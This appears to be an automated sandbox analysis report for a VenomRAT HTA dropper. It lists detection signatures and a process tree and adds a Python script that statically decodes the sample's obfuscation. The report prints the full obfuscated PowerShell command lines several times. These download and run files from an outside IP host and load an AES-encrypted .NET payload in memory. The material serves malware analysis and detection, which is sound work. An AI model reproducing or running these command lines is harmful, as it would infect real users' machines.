Windows Analysis Report
hta.hta

Overview

General Information

Sample name: hta.hta
Analysis ID: 1429074
MD5: dbc5a204c56d2c6c974bb9ce287978d4
SHA1: dca280ec6fcc06611132200b78bf9e7bd66504ef
SHA256: d8a8f1d0c357bdecb7bb471e1809231088ed6d4489355da038807aa1a73e964e
Tags: hta, venomrat

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Uses known network protocols on non-standard ports
Very long command line found
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Dosfuscation Activity
Sigma detected: Suspicious Office Outbound Connections
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • mshta.exe (PID: 7240 cmdline: mshta.exe "C:\Users\user\Desktop\hta.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • powershell.exe (PID: 7332 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function zyfTBcnYzprd($pHHdIofq, $hQvuJry){[IO.File]::WriteAllBytes($pHHdIofq, $hQvuJry)};function RsNIEjCO($pHHdIofq){if($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61328,61336,61336))) -eq $True){rundll32.exe $pHHdIofq }elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61340,61343,61277))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $pHHdIofq}elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61337,61343,61333))) -eq $True){misexec /qn /i $pHHdIofq}else{Start-Process $pHHdIofq}};function ZWufiDkKJd($WfmgmuntIKBYcRft){$ywqrhKjGiioXguh = New-Object (ySHQDZBWwySzRGIG @(61306,61329,61344,61274,61315,61329,61326,61295,61336,61333,61329,61338,61344));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$hQvuJry = $ywqrhKjGiioXguh.DownloadData($WfmgmuntIKBYcRft);return $hQvuJry};function ySHQDZBWwySzRGIG($xGZDVkPMYLYy){$yFBtdzpE=61228;$oUSwLv=$Null;foreach($fxEGQMN in $xGZDVkPMYLYy){$oUSwLv+=[char]($fxEGQMN-$yFBtdzpE)};return $oUSwLv};function dDSCNJIjjRgIM(){$lBhpKXrqsdodra = $env:AppData + '\';$RtGcEcBBqYud = $lBhpKXrqsdodra + 'jiteon.xlsx';If(Test-Path -Path $RtGcEcBBqYud){Invoke-Item $RtGcEcBBqYud;}Else{ $hKUnbCqsPbBsWBpNkbF = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61334,61333,61344,61329,61339,61338,61274,61348,61336,61343,61348));zyfTBcnYzprd $RtGcEcBBqYud $hKUnbCqsPbBsWBpNkbF;Invoke-Item $RtGcEcBBqYud;};$gzgwwTbWpZOp = $lBhpKXrqsdodra + 'GoGi.bat'; if (Test-Path -Path $gzgwwTbWpZOp){RsNIEjCO $gzgwwTbWpZOp;}Else{ $VgJdQKaf = ZWufiDkKJd (ySHQDZBWwySzRGIG 
@(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61299,61339,61299,61333,61274,61326,61325,61344));zyfTBcnYzprd $gzgwwTbWpZOp $VgJdQKaf;RsNIEjCO $gzgwwTbWpZOp;};;;;}dDSCNJIjjRgIM; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • EXCEL.EXE (PID: 7500 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\AppData\Roaming\jiteon.xlsx" MD5: 4A871771235598812032C822E6F68F19)
        • splwow64.exe (PID: 7896 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
      • cmd.exe (PID: 7536 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\GoGi.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 7580 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\GoGi.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7628 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\GoGi.bat';$gPQY='CmYpnhamYpnnmYpngmYpnemYpnEmYpnxtmYpnenmYpnsmYpniomYpnnmYpn'.Replace('mYpn', ''),'LoaUtEPdUtEP'.Replace('UtEP', ''),'MaiCYgQnMCYgQodCYgQuleCYgQ'.Replace('CYgQ', ''),'SprHTnlitrHTn'.Replace('rHTn', ''),'TrrzhRarzhRnsfrzhRorrzhRmFrzhRirzhRnarzhRlBlrzhRorzhRckrzhR'.Replace('rzhR', ''),'GetuUbXCuUbXuuUbXruUbXreuUbXntuUbXPuUbXrouUbXcuUbXesuUbXsuUbX'.Replace('uUbX', ''),'FrFEdOomBFEdOasFEdOe64FEdOStrFEdOiFEdOngFEdO'.Replace('FEdO', ''),'ReanclddLncldinencldsncld'.Replace('ncld', ''),'DjPqYejPqYcojPqYmpjPqYrejPqYssjPqY'.Replace('jPqY', ''),'IPIJhnvPIJhokPIJhePIJh'.Replace('PIJh', ''),'CopZKPiyTZKPioZKPi'.Replace('ZKPi', ''),'ElIXGDeIXGDmIXGDenIXGDtAIXGDtIXGD'.Replace('IXGD', ''),'CruXrmeuXrmatuXrmeDeuXrmcryuXrmptuXrmoruXrm'.Replace('uXrm', ''),'EJuQRntJuQRrJuQRyPJuQRoinJuQRtJuQR'.Replace('JuQR', '');powershell -w hidden;function oukWk($hMAdX){$uBEEb=[System.Security.Cryptography.Aes]::Create();$uBEEb.Mode=[System.Security.Cryptography.CipherMode]::CBC;$uBEEb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$uBEEb.Key=[System.Convert]::($gPQY[6])('TGdOerQan8DiYOIpc1W3E6Uf7wMJSi91JjPhdKuCB3Q=');$uBEEb.IV=[System.Convert]::($gPQY[6])('CruLH9j6aex2cpz0fozZ+w==');$XBRRE=$uBEEb.($gPQY[12])();$gomww=$XBRRE.($gPQY[4])($hMAdX,0,$hMAdX.Length);$XBRRE.Dispose();$uBEEb.Dispose();$gomww;}function SIliJ($hMAdX){$nQeHe=New-Object System.IO.MemoryStream(,$hMAdX);$EvPMN=New-Object System.IO.MemoryStream;$uxdRy=New-Object System.IO.Compression.GZipStream($nQeHe,[IO.Compression.CompressionMode]::($gPQY[8]));$uxdRy.($gPQY[10])($EvPMN);$uxdRy.Dispose();$nQeHe.Dispose();$EvPMN.Dispose();$EvPMN.ToArray();}$WrkBk=[System.IO.File]::($gPQY[7])([Console]::Title);$dItwN=SIliJ (oukWk ([Convert]::($gPQY[6])([System.Linq.Enumerable]::($gPQY[11])($WrkBk, 5).Substring(2))));$Yylgf=SIliJ (oukWk 
([Convert]::($gPQY[6])([System.Linq.Enumerable]::($gPQY[11])($WrkBk, 6).Substring(2))));[System.Reflection.Assembly]::($gPQY[1])([byte[]]$Yylgf).($gPQY[13]).($gPQY[9])($null,$null);[System.Reflection.Assembly]::($gPQY[1])([byte[]]$dItwN).($gPQY[13]).($gPQY[9])($null,$null); " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • powershell.exe (PID: 7636 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • powershell.exe (PID: 7828 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • svchost.exe (PID: 7916 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
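The two PowerShell stages in the process tree above each hide their strings differently: the stage launched by mshta.exe (PID 7332) stores every string as an array of integers and rebuilds it at run time with a helper that subtracts a constant (61228) from each element and casts to [char]; the hidden stage started from GoGi.bat (PID 7628 onwards) stores .NET member names with a junk token spliced in, strips it with .Replace(token, '') and then calls members by index into that array. The decoder below is an added example written for this page, not code from the report or from the sample. The PowerShell excerpts it works on are copied from the two command lines; the function names, regexes and summary layout are mine.

```python
"""Offline decoder for the two string-obfuscation layers used by the sample's
PowerShell stages. Added example for this page; the PowerShell excerpts are
copied from the command lines in the process tree, everything else here
(function names, regexes, the summary layout) is constructed."""
import base64
import re

# Excerpt of the stage-1 command line (PID 7332): the decoder function and every call site.
STAGE1 = (
    "function RsNIEjCO($pHHdIofq){if($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61328,61336,61336))) -eq $True){rundll32.exe $pHHdIofq }"
    "elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61340,61343,61277))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $pHHdIofq}"
    "elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61337,61343,61333))) -eq $True){misexec /qn /i $pHHdIofq}else{Start-Process $pHHdIofq}};"
    "function ZWufiDkKJd($WfmgmuntIKBYcRft){$ywqrhKjGiioXguh = New-Object (ySHQDZBWwySzRGIG @(61306,61329,61344,61274,61315,61329,61326,61295,61336,61333,61329,61338,61344));"
    "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$hQvuJry = $ywqrhKjGiioXguh.DownloadData($WfmgmuntIKBYcRft);return $hQvuJry};"
    "function ySHQDZBWwySzRGIG($xGZDVkPMYLYy){$yFBtdzpE=61228;$oUSwLv=$Null;foreach($fxEGQMN in $xGZDVkPMYLYy){$oUSwLv+=[char]($fxEGQMN-$yFBtdzpE)};return $oUSwLv};"
    "$hKUnbCqsPbBsWBpNkbF = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61334,61333,61344,61329,61339,61338,61274,61348,61336,61343,61348));"
    "$VgJdQKaf = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61299,61339,61299,61333,61274,61326,61325,61344));"
)

# Excerpt of the stage-2 command line (PID 7628): the name array and the call sites that use it.
STAGE2 = (
    "$gPQY='CmYpnhamYpnnmYpngmYpnemYpnEmYpnxtmYpnenmYpnsmYpniomYpnnmYpn'.Replace('mYpn', ''),'LoaUtEPdUtEP'.Replace('UtEP', ''),"
    "'MaiCYgQnMCYgQodCYgQuleCYgQ'.Replace('CYgQ', ''),'SprHTnlitrHTn'.Replace('rHTn', ''),"
    "'TrrzhRarzhRnsfrzhRorrzhRmFrzhRirzhRnarzhRlBlrzhRorzhRckrzhR'.Replace('rzhR', ''),"
    "'GetuUbXCuUbXuuUbXruUbXreuUbXntuUbXPuUbXrouUbXcuUbXesuUbXsuUbX'.Replace('uUbX', ''),"
    "'FrFEdOomBFEdOasFEdOe64FEdOStrFEdOiFEdOngFEdO'.Replace('FEdO', ''),'ReanclddLncldinencldsncld'.Replace('ncld', ''),"
    "'DjPqYejPqYcojPqYmpjPqYrejPqYssjPqY'.Replace('jPqY', ''),'IPIJhnvPIJhokPIJhePIJh'.Replace('PIJh', ''),"
    "'CopZKPiyTZKPioZKPi'.Replace('ZKPi', ''),'ElIXGDeIXGDmIXGDenIXGDtAIXGDtIXGD'.Replace('IXGD', ''),"
    "'CruXrmeuXrmatuXrmeDeuXrmcryuXrmptuXrmoruXrm'.Replace('uXrm', ''),'EJuQRntJuQRrJuQRyPJuQRoinJuQRtJuQR'.Replace('JuQR', '');"
    "$uBEEb.Key=[System.Convert]::($gPQY[6])('TGdOerQan8DiYOIpc1W3E6Uf7wMJSi91JjPhdKuCB3Q=');"
    "$uBEEb.IV=[System.Convert]::($gPQY[6])('CruLH9j6aex2cpz0fozZ+w==');$XBRRE=$uBEEb.($gPQY[12])();"
    "$gomww=$XBRRE.($gPQY[4])($hMAdX,0,$hMAdX.Length);$WrkBk=[System.IO.File]::($gPQY[7])([Console]::Title);"
    "$dItwN=SIliJ (oukWk ([Convert]::($gPQY[6])([System.Linq.Enumerable]::($gPQY[11])($WrkBk, 5).Substring(2))));"
    "[System.Reflection.Assembly]::($gPQY[1])([byte[]]$Yylgf).($gPQY[13]).($gPQY[9])($null,$null);"
)


def decode_stage1(script):
    """Locate the subtract-and-cast helper, read its offset from the script
    itself, and decode every 'helper @(n,n,...)' call site in order."""
    m = re.search(r"function (\w+)\(\$\w+\)\{\$(\w+)=(\d+);.*?\[char\]\(\$\w+-\$\2\)", script, re.S)
    if not m:
        raise ValueError("no integer-array decoder found")
    name, offset = m.group(1), int(m.group(3))
    calls = re.findall(re.escape(name) + r" @\(([\d,]+)\)", script)
    return ["".join(chr(int(n) - offset) for n in arr.split(",")) for arr in calls]


def decode_stage2(script):
    """Resolve every 'junk-spliced'.Replace('junk', '') literal, in array order."""
    return [s.replace(junk, "") for s, junk in
            re.findall(r"'([^']*)'\.Replace\('([^']*)', ''\)", script)]


def resolve_members(script, names, var="gPQY"):
    """Rewrite ($var[n]) call sites to the member names they stand for."""
    return re.sub(r"\(\$" + re.escape(var) + r"\[(\d+)\]\)",
                  lambda m: names[int(m.group(1))], script)


def aes_params(resolved):
    """Key and IV sizes in bits, from the FromBase64String literals on .Key and .IV."""
    key = re.search(r"\.Key=\[System\.Convert\]::FromBase64String\('([^']+)'\)", resolved)
    iv = re.search(r"\.IV=\[System\.Convert\]::FromBase64String\('([^']+)'\)", resolved)
    if not (key and iv):
        raise ValueError("AES key/IV literals not found")
    return len(base64.b64decode(key.group(1))) * 8, len(base64.b64decode(iv.group(1))) * 8


def summarize():
    stage1 = decode_stage1(STAGE1)
    names = decode_stage2(STAGE2)
    resolved = resolve_members(STAGE2, names)
    key_bits, iv_bits = aes_params(resolved)
    return {
        "stage1_strings": stage1,
        "stage1_urls": [s for s in stage1 if s.startswith("http")],
        "stage2_members": names,
        "aes_key_bits": key_bits,
        "aes_iv_bits": iv_bits,
        "stage2_loader": re.search(r"\[System\.Reflection\.Assembly\]::[^;]+", resolved).group(0),
    }


if __name__ == "__main__":
    for key, value in summarize().items():
        print(f"{key}: {value}")
```

Reading the offset out of the script rather than hard-coding 61228 means the same function works on the next build of this loader with a different constant. The resolved stage-2 call sites show the unpacking order without running anything: lines 5 and 6 of GoGi.bat (minus a two-character prefix) are base64-decoded, AES-CBC-decrypted with a 256-bit key and 128-bit IV under PKCS7 padding, gunzipped, and passed to Assembly.Load followed by EntryPoint.Invoke.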
Source: Process Memory Space: powershell.exe PID: 7332 | Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen | Strings:
  • 0x418d0:$b1: ::WriteAllBytes(
  • 0x439a2:$b1: ::WriteAllBytes(
  • 0x4430f:$b1: ::WriteAllBytes(
  • 0x44a96:$b1: ::WriteAllBytes(
  • 0x77925:$b1: ::WriteAllBytes(
  • 0x989ee:$b1: ::WriteAllBytes(
  • 0x99319:$b1: ::WriteAllBytes(
  • 0x99d88:$b1: ::WriteAllBytes(
  • 0x9a770:$b1: ::WriteAllBytes(
  • 0x1a0e39:$b1: ::WriteAllBytes(
  • 0x1a15c0:$b1: ::WriteAllBytes(
  • 0x1a69ca:$b1: ::WriteAllBytes(
  • 0x1a7151:$b1: ::WriteAllBytes(
  • 0x1c03f0:$b1: ::WriteAllBytes(
  • 0x1c97f2:$b1: ::WriteAllBytes(
  • 0x2146cc:$b1: ::WriteAllBytes(
  • 0x214e53:$b1: ::WriteAllBytes(
  • 0x21578f:$b1: ::WriteAllBytes(
  • 0x2167c6:$b1: ::WriteAllBytes(
  • 0xa8767:$s1: -join
  • 0xaada0:$s1: -join

System Summary

Source: Process started | Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function zyfTBcnYzprd($pHHdIofq, $hQvuJry){[IO.File]::WriteAllBytes($pHHdIofq, $hQvuJry)};function RsNIEjCO($pHHdIofq){if($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61328,61336,61336))) -eq $True){rundll32.exe $pHHdIofq }elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61340,61343,61277))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $pHHdIofq}elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61337,61343,61333))) -eq $True){misexec /qn /i $pHHdIofq}else{Start-Process $pHHdIofq}};function ZWufiDkKJd($WfmgmuntIKBYcRft){$ywqrhKjGiioXguh = New-Object (ySHQDZBWwySzRGIG @(61306,61329,61344,61274,61315,61329,61326,61295,61336,61333,61329,61338,61344));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$hQvuJry = $ywqrhKjGiioXguh.DownloadData($WfmgmuntIKBYcRft);return $hQvuJry};function ySHQDZBWwySzRGIG($xGZDVkPMYLYy){$yFBtdzpE=61228;$oUSwLv=$Null;foreach($fxEGQMN in $xGZDVkPMYLYy){$oUSwLv+=[char]($fxEGQMN-$yFBtdzpE)};return $oUSwLv};function dDSCNJIjjRgIM(){$lBhpKXrqsdodra = $env:AppData + '\';$RtGcEcBBqYud = $lBhpKXrqsdodra + 'jiteon.xlsx';If(Test-Path -Path $RtGcEcBBqYud){Invoke-Item $RtGcEcBBqYud;}Else{ $hKUnbCqsPbBsWBpNkbF = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61334,61333,61344,61329,61339,61338,61274,61348,61336,61343,61348));zyfTBcnYzprd $RtGcEcBBqYud $hKUnbCqsPbBsWBpNkbF;Invoke-Item $RtGcEcBBqYud;};$gzgwwTbWpZOp = $lBhpKXrqsdodra + 'GoGi.bat'; if (Test-Path -Path $gzgwwTbWpZOp){RsNIEjCO $gzgwwTbWpZOp;}Else{ $VgJdQKaf = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61299,61339,61299,61333,61274,61326,61325,61344));zyfTBcnYzprd $gzgwwTbWpZOp $VgJdQKaf;RsNIEjCO $gzgwwTbWpZOp;};;;;}dDSCNJIjjRgIM;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function zyfTBcnYzprd($pHHdIofq, $hQvuJry){[IO.File]::WriteAllBytes($pHHdIofq, $hQvuJry)};function RsNIEjCO($pHHdIofq){if($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61328,61336,61336))) -eq $True){rundll32.exe $pHHdIofq }elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61340,61343,61277))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $pHHdIofq}elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61337,61343,61333))) -eq $True){misexec /qn /i $pHHdIofq}else{Start-Process $pHHdIofq}};function ZWufiDkKJd($WfmgmuntIKBYcRft){$ywqrhKjGiioXguh = New-Object (ySHQDZBWwySzRGIG @(61306,61329,61344,61274,61315,61329,61326,61295,61336,61333,61329,61338,61344));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$hQvuJry = $ywqrhKjGiioXguh.DownloadData($WfmgmuntIKBYcRf
Source: File created | Author: Subhash Popuri (@pbssubhash) | Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7332, TargetFilename: C:\Users\user\AppData\Roaming\GoGi.bat
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function zyfTBcnYzprd($pHHdIofq, $hQvuJry){[IO.File]::WriteAllBytes($pHHdIofq, $hQvuJry)};function RsNIEjCO($pHHdIofq){if($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61328,61336,61336))) -eq $True){rundll32.exe $pHHdIofq }elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61340,61343,61277))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $pHHdIofq}elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61337,61343,61333))) -eq $True){misexec /qn /i $pHHdIofq}else{Start-Process $pHHdIofq}};function ZWufiDkKJd($WfmgmuntIKBYcRft){$ywqrhKjGiioXguh = New-Object (ySHQDZBWwySzRGIG @(61306,61329,61344,61274,61315,61329,61326,61295,61336,61333,61329,61338,61344));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$hQvuJry = $ywqrhKjGiioXguh.DownloadData($WfmgmuntIKBYcRft);return $hQvuJry};function ySHQDZBWwySzRGIG($xGZDVkPMYLYy){$yFBtdzpE=61228;$oUSwLv=$Null;foreach($fxEGQMN in $xGZDVkPMYLYy){$oUSwLv+=[char]($fxEGQMN-$yFBtdzpE)};return $oUSwLv};function dDSCNJIjjRgIM(){$lBhpKXrqsdodra = $env:AppData + '\';$RtGcEcBBqYud = $lBhpKXrqsdodra + 'jiteon.xlsx';If(Test-Path -Path $RtGcEcBBqYud){Invoke-Item $RtGcEcBBqYud;}Else{ $hKUnbCqsPbBsWBpNkbF = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61334,61333,61344,61329,61339,61338,61274,61348,61336,61343,61348));zyfTBcnYzprd $RtGcEcBBqYud $hKUnbCqsPbBsWBpNkbF;Invoke-Item $RtGcEcBBqYud;};$gzgwwTbWpZOp = $lBhpKXrqsdodra + 'GoGi.bat'; if (Test-Path -Path $gzgwwTbWpZOp){RsNIEjCO $gzgwwTbWpZOp;}Else{ $VgJdQKaf = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61299,61339,61299,61333,61274,61326,61325,61344));zyfTBcnYzprd $gzgwwTbWpZOp $VgJdQKaf;RsNIEjCO $gzgwwTbWpZOp;};;;;}dDSCNJIjjRgIM;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function zyfTBcnYzprd($pHHdIofq, $hQvuJry){[IO.File]::WriteAllBytes($pHHdIofq, $hQvuJry)};function RsNIEjCO($pHHdIofq){if($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61328,61336,61336))) -eq $True){rundll32.exe $pHHdIofq }elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61340,61343,61277))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $pHHdIofq}elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61337,61343,61333))) -eq $True){misexec /qn /i $pHHdIofq}else{Start-Process $pHHdIofq}};function ZWufiDkKJd($WfmgmuntIKBYcRft){$ywqrhKjGiioXguh = New-Object (ySHQDZBWwySzRGIG @(61306,61329,61344,61274,61315,61329,61326,61295,61336,61333,61329,61338,61344));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$hQvuJry = $ywqrhKjGiioXguh.DownloadData($WfmgmuntIKBYcRf
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function zyfTBcnYzprd($pHHdIofq, $hQvuJry){[IO.File]::WriteAllBytes($pHHdIofq, $hQvuJry)};function RsNIEjCO($pHHdIofq){if($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61328,61336,61336))) -eq $True){rundll32.exe $pHHdIofq }elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61340,61343,61277))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $pHHdIofq}elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61337,61343,61333))) -eq $True){misexec /qn /i $pHHdIofq}else{Start-Process $pHHdIofq}};function ZWufiDkKJd($WfmgmuntIKBYcRft){$ywqrhKjGiioXguh = New-Object (ySHQDZBWwySzRGIG @(61306,61329,61344,61274,61315,61329,61326,61295,61336,61333,61329,61338,61344));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$hQvuJry = $ywqrhKjGiioXguh.DownloadData($WfmgmuntIKBYcRft);return $hQvuJry};function ySHQDZBWwySzRGIG($xGZDVkPMYLYy){$yFBtdzpE=61228;$oUSwLv=$Null;foreach($fxEGQMN in $xGZDVkPMYLYy){$oUSwLv+=[char]($fxEGQMN-$yFBtdzpE)};return $oUSwLv};function dDSCNJIjjRgIM(){$lBhpKXrqsdodra = $env:AppData + '\';$RtGcEcBBqYud = $lBhpKXrqsdodra + 'jiteon.xlsx';If(Test-Path -Path $RtGcEcBBqYud){Invoke-Item $RtGcEcBBqYud;}Else{ $hKUnbCqsPbBsWBpNkbF = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61334,61333,61344,61329,61339,61338,61274,61348,61336,61343,61348));zyfTBcnYzprd $RtGcEcBBqYud $hKUnbCqsPbBsWBpNkbF;Invoke-Item $RtGcEcBBqYud;};$gzgwwTbWpZOp = $lBhpKXrqsdodra + 'GoGi.bat'; if (Test-Path -Path $gzgwwTbWpZOp){RsNIEjCO $gzgwwTbWpZOp;}Else{ $VgJdQKaf = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61299,61339,61299,61333,61274,61326,61325,61344));zyfTBcnYzprd $gzgwwTbWpZOp $VgJdQKaf;RsNIEjCO $gzgwwTbWpZOp;};;;;}dDSCNJIjjRgIM;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function zyfTBcnYzprd($pHHdIofq, $hQvuJry){[IO.File]::WriteAllBytes($pHHdIofq, $hQvuJry)};function RsNIEjCO($pHHdIofq){if($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61328,61336,61336))) -eq $True){rundll32.exe $pHHdIofq }elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61340,61343,61277))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $pHHdIofq}elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61337,61343,61333))) -eq $True){misexec /qn /i $pHHdIofq}else{Start-Process $pHHdIofq}};function ZWufiDkKJd($WfmgmuntIKBYcRft){$ywqrhKjGiioXguh = New-Object (ySHQDZBWwySzRGIG @(61306,61329,61344,61274,61315,61329,61326,61295,61336,61333,61329,61338,61344));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$hQvuJry = $ywqrhKjGiioXguh.DownloadData($WfmgmuntIKBYcRf
